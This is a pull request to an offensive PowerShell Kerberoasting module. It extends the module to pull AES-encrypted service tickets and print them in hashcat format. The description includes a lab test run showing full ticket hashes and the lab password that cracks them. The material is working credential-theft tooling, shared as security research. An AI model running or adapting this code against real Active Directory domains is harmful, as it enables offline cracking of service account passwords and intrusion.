### PR TITLE
Aes kerberoast

### DIFF
--- a/data/module_source/credentials/Invoke-Kerberoast.ps1
+++ b/data/module_source/credentials/Invoke-Kerberoast.ps1
@@ -589,7 +589,11 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
                 }
                 $Out | Add-Member Noteproperty 'Hash' $HashFormat
                 $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
-                Write-Output $Out
+                #Prints the PS Object
+                #Write-Output $Out
+ 
+                #Prints just the hashes
+                Write-Output $HashFormat
             }
         }
     }

--- a/data/module_source/credentials/Invoke-Kerberoast.ps1
+++ b/data/module_source/credentials/Invoke-Kerberoast.ps1
@@ -584,7 +584,7 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
                         $UserDomain = 'UNKNOWN'
                     }
                     # hashcat output format
-                        $HashFormat = "`$krb5tgs`$$encType`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
+                    $HashFormat = "`$krb5tgs`$$encType`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
                    
                 }
                 $Out | Add-Member Noteproperty 'Hash' $HashFormat

--- a/data/module_source/credentials/Invoke-Kerberoast.ps1
+++ b/data/module_source/credentials/Invoke-Kerberoast.ps1
@@ -562,6 +562,7 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
             }
             if ($TicketByteStream) {
                 $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'
+                $encType =  [Convert]::ToInt32(($TicketHexStream -replace ".*A0030201")[0..1] -join "", 16)
                 [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split 'A48201'
                 $Parts.RemoveAt($Parts.Count - 1)
                 $Hash = $Parts -join 'A48201'
@@ -582,9 +583,9 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
                     else {
                         $UserDomain = 'UNKNOWN'
                     }
-
                     # hashcat output format
-                    $HashFormat = "`$krb5tgs`$23`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
+                        $HashFormat = "`$krb5tgs`$$encType`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
+                   
                 }
                 $Out | Add-Member Noteproperty 'Hash' $HashFormat
                 $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')


### PR DESCRIPTION
Myself and a colleague spoke at DerbyCon about some recent Kerberos research we have done.  This PR is the result of that research, and allows users to pull AES tickets when a service account is configured to encrypt TGS tickets with AES.  You may notice, I only modified the hashcat output, as john is going to be more complicated.  John's hash format lacks definition and doesn't account for the possibility of multiple tgs hash types.  As far as I'm concerned that is a problem for the folks at john to figure out.  The password used for all of the following examples is "Weakpass1"

Testing:
```powershell
PS C:\EmpirePath > klist purge;Import-Module .\Invoke-Kerberoast.ps1; invoke-kerberoast -OutputFormat Hashcat|fl


SamAccountName       : rc4_svc
DistinguishedName    : CN=RC4 Service,OU=Service Accounts,DC=goat,DC=derby,DC=local
ServicePrincipalName : HTTP/client.goat.derby.local:8080
Hash                 : $krb5tgs$23$*rc4_svc$goat.derby.local$HTTP/client.goat.derby.local:8080*$312ED16F0E887D08BD3010DE391C7854$AFC2F19DBEB0F11D362DEAFC2AC6E79069A517AB
                       BA6FCA5F335C243C9DA40B0E75E838A8A2F9C37A312D1276B6A9789F7C7634BFEFFEA8562F691FD64B3DC4AB7C52B7D622747694857B62B14B84751C028BE06CD195B2ABCE5AC7716E
                       7E969F4B9616F64CBF820CA130824BC4AD3B08C117E3A52F68FADA9B71FD3A42D53D87FF40140DE851CCBFB8535A330B57F8E2FC5B042BDA25A400E5A4DE1B2E6F6997857E2175F1DD
                       7E7FC966C926CDC06A24F23CAC8A803626D1E52E302C9FFC312E31864B5BE014B3D681CE3CA7A0D47CBDCBF6C0A84C9C5CF2ECA62DC5E7035DFE6267522155766EFAF56247C431456F
                       388E600DD8DEC6D2210CD8C36907BAC4506D976707F83231A0ED86347FF3D6F1F2005FB1C951E1FD5D7B06CDA2A5E6B4AB5806B63CF7E55919F846F1452BDF9D883D100EBEE634A398
                       4111B1DDBE2F67320382E9A183B5DFEEDA2DF80339B523C302DE120B7B1621E6A31416D43901B5E3C6A42635C74D883273426F7C3821DFC9289E8CDC2434AFEC09BB8331F66066172B
                       B1822FAB637E6AEED26DB36885A14A1565D36CAC2D07DE0BFF7A0CB312B1F78C21BDAA48AFFD3EBA0EFE93DFA4AF38FE65B9A3232A1DDB6BD09EAFB9E712154734B0D9A9BD3723C505
                       01D81E93B2295A236EFCDFC9805E9F94340CF3223F71CFAC9A4DD346C44F77D6A1B972048F9B0133CA1B86F21AEACC1D7178822F1FAF24A0905CCEDB32354A298FD80F3199C17FA1C8
                       334C34233AE3092DDC2FB35019C4423CEC5EF0E62BE71369974A0F65EBD3DBC43B046B7034E71F72C70095125E5AB1E84375EC8F81F4A93011F685C49FF6D8C6CB867B1E780D212410
                       BD3FFB6FE2A548F301FD4DD131EF071B5449FAF6E368170DE5D68216319E473FB8448EDD5C5006E4F0102DAF32223AAA137E5A7636F5312A4BBB4E93ED5674CC7ABEAEBC757A3F2E58
                       BBFB6EBD58DA5DAA13BC6C0D41B2045CA3338D3DE8FF7650F2EE6AA47FC6197BDAE34DBC4A25364690A55900B1EE2496682DFD09800BD6776D06ED9A7F8C27CE1F0957F310DA0DEBBC
                       A771F101454A2C632E05B1C6BCC7C8536F6C7A914DB8DD3ED9D985F44A953BD917056168FF51D20F9DCEFC1CE8424E07F9DB73756A2B4374013530C146A913EDD0BBA4EBA7096B453C
                       D8160CF00B2A271433FD30F6BA91844B48052CE0C55889CF5F4B693CEA6DA2C93037A4042D72FA9323990683681EE6DDCAED70E3ABD70D0AC2902525268E6F8C494412D1637DD5615C
                       AAB7297D3EA5CFC5EF415527496208401E35AE8721E0369B4E6A4688988CFA2D709811E92C23DC954458337540AE2AB093F7EBD2BB63DD0DDB4DBBCEDAA630F081CF5A101956A2B356
                       D4A432A36F9587BB20B931928E9C5A5954435E2E0D1820CD8DDEC165C6EFEA5ED55FFF613A7F4C6E4F0CB5F75F613B30439F31D3EF0CE8D4287864783F2FA58263277E39D39687A49B
                       5BABF7D266D48328713B34B5C6B3321B7A3319CD0E1BDA578F76068C928EB1ECCC201CF26ACD31F284A90D785C5326EEC7BC2449BA43C5A601D2206072D1B9E7FF96822762EA0FBEF4
                       D4E8C6B6619814C2DC08329D4D85C915E109276BE241ED9B5778BDA80D32E2B09282E41EBD90C16E1B816D3359

SamAccountName       : aes256_svc
DistinguishedName    : CN=AES 256 Service,OU=Service Accounts,DC=goat,DC=derby,DC=local
ServicePrincipalName : HTTP/client.goat.derby.local:9090
Hash                 : $krb5tgs$18$*aes256_svc$goat.derby.local$HTTP/client.goat.derby.local:9090*$80B149FFB9DCAD067BEBCBBA2D065A69$65FF8BA72C875DCF7431231DCB2AAEE5A013D
                       CF4160D2E9483D91288566EA99D784EDA29C93C1AE999A8911DBAD6891656B20BEEAB1B765BF581AE1E8C244B7E797E875C4A365B068DFDA6FF280DE659FBC8330D645AF1A10471F32
                       A4E92BC60BD34FFFCD5E213E36BA17CD335DA3D9ABB66BB267B24D7A6EAD3513575A44F7B3830C42F77C6A0CE7477D89EA9502CA9ADD500FAB4D3562211EB017C36D5B49818DB25DA6
                       0607BEDB41F1A55E29801AA7A681EB1E8C79EB24FA07E8C6B646A91D0ADF8B3B7266DDF88A08D91FA8755AA23A057DC48801CBA46FB90D8F17B62EA505A408A7BEA8D1044A2C5E8945
                       67305DBF36BAB5CA973E04BE99B6748A611952F3EB19994A9A624F273FCA33D53717478E17B67E3179F7AB4EA6A24F1EFD69F43EFAECD5BB79A0E5C9A91820080874C8B2E407C79A91
                       B545FD7AE796E30B9B28D85169B67571BCEFD23258497BDF5AD75D1F4E572755520E470F8B0854FB0C60A792D48AA1AB2C317A586702BAE4F7EA9308982E2FD1844E02D53502FC4345
                       8AE25204CE917DE0C825D088140AD4110FFAC0C840C00E4CCB0659ABE05C934A35F5BDB220F2ACC724760E4D884B4D26C2E7A92A6924D94E3BDB886C86A4C344B0D3314BF91848D7A6
                       DA74AD7ACE956EC318841788E519045580FDCDF10460F9DDB701E5BA9BD0878FCB82459E3DDB52D29C487B90BAFDC679E581F4305BB888E5DB0559A09BE60CBD3AE8A21C9660D0A95D
                       F19475A83524A8642469A18A4C84235BDD8C4C23C0FEBAA89FEF87C771753BDE5600CA34650D1CA3100174DF8B18CA156B859DB43BA06B1927EDDC5234B901E571F05E030535BD7EE2
                       5E5367EBD06AAF95EF789DEAFCD6F60BD81F5A33CF5FB0EAFF811F72B27155E6C31944F7606A5A99F28FA285E02C15407D22EE0CE3617189489067C4CC6ADCE1C3242E112ABAFF30B5
                       B64DB8716000006AB84D2EE45EBE59CE2D02A336D01235CA56355AA1A67F8BD4DCABF6309372C482430244DD35662A668A3DEF113E040AFD4CA355DB21328EC51384BFCA5348F1F141
                       90E1D0C7372E1C059F8FDCAFBA5146E6273C59F5478BE3C77F365B3DA42D789DAA6D2336866969DA8FCAC83735222BD1B25916D5611F2EC5F2ECEDA05F8B38A958E9BAFF1F6C32142D
                       22F41E853BA255D02C761071E48BC282BA1EDF412DAF2D57E7482878818A7B3783E38B7C2AA594E21D5692B25E7924DAA8F27881CA89608EDF3A726EF1A8CF790033D34A6D09FB1A3F
                       5A63255D9AF0E9E7B1321F53BC8B03770ADAFB5CE1062FCC8E2694D15DE5E198BA6A4C1172E7F3B75E349AD9DFDE5DD5C1A5B11ABAFCA71CB6B4AF02BBCA042B8CE61F40F0416E928A
                       4FF5DD9CEC5969ADF93CBBBB9D1952D7BBF752005980E8AF99AE533A7A62798836774FBFD474AA69E1138A9FCA6424FCF588AEF576E1B84BD60CF134CE78179B9D3DFCD8488DE81A52
                       DE6470627B7962CFB519CEA5B8F4EB676CE18D8A0DB6EB80BB98AB1E1E00743DA1324AFC36CF4D33413F1FB43205EA04B54E26704CEDB248F414CB7EA212F49E513FC656101B2C38EE
                       3155879CF214B963CCF35FD7AD3B58235398499FF661F6505B29B3E72D6FA4D64878A1C9187FA6C780AD2792B858562DFDDC3DE06B800D117B713

SamAccountName       : aes128_svc
DistinguishedName    : CN=AES 128 Service,OU=Service Accounts,DC=goat,DC=derby,DC=local
ServicePrincipalName : HTTP/client.got.derby.local:8085
Hash                 : $krb5tgs$17$*aes128_svc$goat.derby.local$HTTP/client.got.derby.local:8085*$8DB6AAE2E55C2B1FD1A78A34010D36E0$11865E0EC0DE1FFE0C3EF5DEFB692E841E0A93
                       2A8611138F13A323A28703779CFCE10D18619F31A953CAA48EAA9194044AE94DFCF457CF9649B8C64512BD5FA72CA118C50B889BF03FE92622BC7908ECB355F8992080D78ED38968C7
                       0769DAB28608C007C9E21B2DD660022035703F514FBC68D9B88AEA2140B37EC773D17D6B95D54FF9FFAEB5A47243B08DB5B0678C5DC5E3A6FC3D9FBD828EC2430C9969167798A2AF0A
                       200BAB4C2A4277ECF9C6ACC0CCE2B31F8E44C90A3764D783DD33D7A89A7F49FA582525737C73A6A8CC2EED8E85921462120C1A80421A52F804961240F933A3F7D2A4E33256E78D9A02
                       DBBCC19104A929A4D7AE4687E225C34CF5BBA72E4C535C5B9AF1E5C4938B885F2112523B14899484ABCF3843B2A9AFFFBC74203A9B0569CADBDA155229A21E2BFA0352640E99D90F9F
                       02411B0ADE52D3D33B0F69DE2FB527DA881A4564769B7A9FC2D1815E33C549369B2C82AD393A7829F866FE2FC178CD7988AD03E09458C6AB204858347A8FC2A26F1122AD85AD115D43
                       BE55B2121B24A29F432766CA3DD87FBC5DACBB1697F9092253E5295B561E7A81BC73741803D8DD8E0DA45F29BCAD2F03E8EE3283886FCB62179A9AF7463D085C6157CF4288EA179DE8
                       5682BE889360D46A5C421B9F77707DB308AEE380224D404976EA659202B67AC9B2CAD7EA4F3CAC6A7835F78058FBD58E777203F06B4A4C8401BCA023BF4B1E7F6C8F519E516A0A506B
                       9A7D315C9EF1A600AE31F271D8BECB66F6917C51A2467B76BF092C654BB6071502F27E26E533F39AF6240562225897FB17FD12FEA6BE9D6D842662A3B278598326AE885E13380FC443
                       5975F2E08B9DEA4EAF9737A00DF55AC54562C1BC4581CD735A65C56EB093B5EBB0C5A5E9E50331447599DD9CD14C4E71D2780B8969109BC79957537A41A89EA12422BB63824B129907
                       2804B9C291308DFF8352BC42995E62008FB9A261E0AB4BF34CE54D5C21551F06747687FB5FA9AB5582C9A34A4437EAECA4BC8F457032C84666D5CF2130E856D1DCF72F93EAE679B6D3
                       9F9845E6BCA520CD9E430B365CEC580A02C819F5FC322FAF1E493FBEA417A1FF4E13AC238D22E0081EF83F03A5586B38EE7F5CFBA468FC65688FEB78C1E365C77B63CA2F69F606D441
                       BAF3CB1138B1C94EB824A7838E1413CD7DECABB9D0C68E24DBC7EAB68DF90779F3A0B5BA830D5E718E1001FEA9CF4DA59D0DD2EDF6784FEC54EC5D8882385DC7C6388F22A6F376A1D2
                       BC7F4FAD4CE5681588A4668AD07E340951B2A92DC29263BF3F7BA1E03A84EFF2D39DB9161B9647D82F1279E569B98C72671A5663FFF6D1CE5130DD501C2C9265F1711A97C1F967C3AB
                       C31F3831E81B615C93902AB0D168EBADBBF078FCA7BF90F9275E68520A835BEF3015B8657777A3DB7EA46193126D8E26B7B78BBA5302D505F9CE755D77EC2A0FBC8CD4250050DFB984
                       933596B3FDDB0BC027632990AC8D2FD4B1C7D3624FEC6153F6AAEBB6F24E5B66190E76A664B6AC2FBB581A71D689C55076FEA3A8E77E348885ED6CDDEF1C03732256EDE458D8D4ADD9
                       8B93C02C78E3691E3F10E21AD95778A3932D5DDF55A939C2780898486970A416A7C4C66C886843ACAF05
```

These examples were validated against the beginning and end of the cipher section of wireshark caps.  This is the AES128 example above.

![aes256](https://user-images.githubusercontent.com/5925087/30888798-59b65b22-a2d7-11e7-8264-e0cab4fcec70.png)
![aes2562](https://user-images.githubusercontent.com/5925087/30888799-59b69b78-a2d7-11e7-810d-d40031490a0f.png)
